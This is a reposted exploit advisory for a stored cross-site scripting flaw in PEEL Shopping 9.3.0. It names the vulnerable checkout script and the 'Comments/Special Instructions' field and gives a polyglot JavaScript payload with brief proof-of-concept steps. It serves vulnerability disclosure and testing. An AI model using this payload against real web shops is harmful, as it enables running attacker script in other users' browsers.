Exploit/Advisories

Published on February 19th, 2021 📆 | 1529 Views ⚑

PEEL Shopping 9.3.0 – ‘Comments/Special Instructions’ Stored Cross-Site Scripting

# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting
# Date: 2021-02-16
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://www.peel.fr/
# Software Link: https://sourceforge.net/projects/peel-shopping/
# Software: PEEL SHOPPING 9.3.0
# Vulnerability Type: Stored Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php
# Vulnerable parameters: 'Comments / Special Instructions :'
# Payload used:

jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//x3csVg/x3e

# POC: in the same page where we injected payload refresh the page.
# You will see your Javascript code (XSS) executed.

Source link

Tagged with: comments • CommentsSpecial • cross • CrossSite • instructions • peel • php • scripting • shopping • special • stored • webapps

Comments are closed.

PEEL Shopping 9.3.0 – ‘Comments/Special Instructions’ Stored Cross-Site Scripting

🌟 Your Account

🔔 Email Subscriptions

Get new posts by email

Donate Via Wallets

Popular

Gloss

☕️Social Media

👥Members

🌍 Forum Groups